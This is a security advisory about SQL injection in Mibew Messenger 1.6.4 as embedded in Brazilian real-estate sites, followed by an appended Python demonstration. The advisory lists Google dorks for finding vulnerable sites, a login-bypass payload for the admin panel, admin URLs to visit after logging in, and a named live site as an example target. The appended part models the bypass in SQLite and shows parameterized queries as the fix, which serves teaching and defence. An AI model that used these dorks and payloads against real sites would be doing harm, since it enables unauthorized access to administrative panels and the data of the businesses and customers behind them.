FormattoDigital Mibew Messenger Open-Source Live Support Software Multiple Vulnerabilities

2018.05.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

######################################################################################################################
# Exploit Title : FormattoDigital Mibew Messenger 1.6.4 | (c) 2011 Messenger Open-Source Live Support Software Admin Control Panel Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team
# Vendor Homepage : formattodigital.com.br / mibew.org
# Date : 28/05/2018
# Tested on : Windows
# Exploit Risk : Medium
######################################################################################################################
# Description :
# Mibew Messenger (also known as Open Web Messenger), as embedded in the affected Parceiros-PetraHost / Formattoweb sites
# under /site/atd/, is an open-source live support application written in PHP and MySQL. It enables one-on-one chat
# assistance in real time directly from your website. The admin control panel at /site/admin/ belongs to the site
# platform itself; the Mibew operator pages are reachable under /site/atd/operator/ once logged in.
# Google Dorks :
# intext:''Formattoweb'' site:br
# intext:''© 2009-2018 Mibew Messenger project''
# intext:''Mibew Messenger 1.6.4 | (c) 2011 mibew.org''
# intext:'' Página Inicial . Imóveis no Mapa . Sobre Nós . Links Úteis . Fale Conosco
# inurl:''/site/pagina/sobre/'' site:br
# Admin Login Path : /site/admin/
# Exploit : Username : '=''or'   Password : '=''or'
# The login form concatenates both fields into the SQL WHERE clause unescaped; the payload closes the quoted
# string so the clause evaluates true for every row and the first user (the administrator) is logged in.
# You can use these URLs in the Admin Control Panel =>
# /site/admin/
# /site/admin/dashboard/itens/
# /site/admin/categoria/
# /site/admin/subcategoria/
# /site/admin/item/novo/
# /site/admin/item/
# /site/admin/item/busca/
# /site/admin/item/posicao/
# /site/admin/proprietario/
# /site/admin/proprietario/imoveis/
# /site/atd/operator/index.php?locale=pt-br
# /site/atd/operator/settings.php
# /site/atd/operator/users.php
# /site/atd/operator/history.php
# /site/atd/operator/statistics.php
# /site/atd/operator/canned.php
# /site/atd/operator/getcode.php
# /site/atd/operator/operators.php
# /site/atd/operator/operator.php?op=1
# /site/atd/operator/performance.php
# /site/atd/operator/operator.php
# /site/atd/operator/themes.php
# /site/atd/operator/updates.php
# /site/atd/operator/cannededit.php?lang=pt-br&group=
# Screenshots from Admin Control Panel =>
# cdn.pbrd.co/images/HnfPgVM.png
# cdn.pbrd.co/images/HnfPpad.png
######################################################################################################################
# SQL Injection Error =>
# If you update this page with a long text, a raw MySQL error is returned:
# /site/admin/configuracao/atualizar/
# Error 1064 => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 's future
# The fragment "near 's future" shows the apostrophe in the submitted text terminating the string literal, i.e. the
# UPDATE statement is also built by concatenation without escaping or prepared statements. Submitting any value
# containing a single quote is enough to confirm this without modifying the stored configuration.
######################################################################################################################
# Example Site => executivaimoveisdf.com.br/site/admin
# [ Proof of Concept ] => archive.is/j0a4Z
######################################################################################################################
# Discovered By KingSkrupellos from Cyberizm Digital Security Team
######################################################################################################################
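The two findings above (the `'=''or'` login bypass and the error 1064 on the configuration update) share one root cause: user input concatenated into SQL text. The following is an added example, not code from the advisory or from the FormattoDigital/Mibew code base. It models both queries in an in-memory SQLite database with a constructed users table (the real PHP/MySQL schema, column names and page code are unknown and assumed here), renders the exact WHERE clause that the advisory's payload produces, and shows the parameterized form that closes both holes. One caveat a tester should know: the advisory's `'=''or'` payload relies on MySQL comparing `0` with `''` numerically (`(username='')=''` is true), which SQLite does not do, so the runnable bypass below uses the equivalent `' OR '1'='1` form.

```python
"""Added example (not the advisory's or the vendor's code): SQL injection in a
login and a settings UPDATE built by string concatenation, next to the
parameterized fix. Schema and data are constructed for illustration."""
import sqlite3

PAYLOAD = "'=''or'"            # value the advisory puts in both login fields
BYPASS = "' OR '1'='1"         # equivalent payload that SQLite also accepts


def make_db() -> sqlite3.Connection:
    """Constructed sample data; the admin row is deliberately row 1."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);"
        "INSERT INTO users VALUES (1, 'admin', 'S3cret!'), (2, 'bob', 'hunter2');"
        "CREATE TABLE config (id INTEGER PRIMARY KEY, texto TEXT);"
        "INSERT INTO config VALUES (1, '');"
    )
    return conn


def vulnerable_where(username: str, password: str) -> str:
    """The WHERE clause a PHP-style concatenated query sends to the server.
    With PAYLOAD in both fields this is
        username=''=''or'' AND password=''=''or''
    which MySQL parses as ((username='')='') OR ... ; username='' is 0, and
    MySQL compares 0 = '' numerically (0 = 0), so it is true for every row."""
    return f"username='{username}' AND password='{password}'"


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Concatenated query: returns the first matching username, or None."""
    sql = "SELECT username FROM users WHERE " + vulnerable_where(username, password)
    row = conn.execute(sql).fetchone()     # first row wins: the administrator
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterized query: the payload is compared as a literal string."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def update_config_vulnerable(conn: sqlite3.Connection, texto: str) -> str:
    """Concatenated UPDATE: an apostrophe in the text ends the string literal,
    the same failure the advisory observed as MySQL error 1064."""
    try:
        conn.execute("UPDATE config SET texto='" + texto + "' WHERE id=1")
        return "ok"
    except sqlite3.OperationalError as exc:      # syntax error near "s future"
        return "syntax error: " + str(exc)


def update_config_safe(conn: sqlite3.Connection, texto: str) -> str:
    """Parameterized UPDATE: quotes in the text are stored, not parsed."""
    conn.execute("UPDATE config SET texto=? WHERE id=1", (texto,))
    return "ok"


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_where(PAYLOAD, PAYLOAD))
    print("vulnerable login as:", login_vulnerable(db, BYPASS, BYPASS))
    print("safe login as:", login_safe(db, BYPASS, BYPASS))
    print(update_config_vulnerable(db, "the company's future plans"))
    print(update_config_safe(db, "the company's future plans"))
```

The fix on the PHP side is the same as `login_safe` and `update_config_safe`: bind every user-supplied value with mysqli or PDO prepared statements instead of interpolating it into the query string, and stop echoing raw database error messages to the browser, since the 1064 text is what confirmed the injection point here.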


Copyright 2024, cxsecurity.com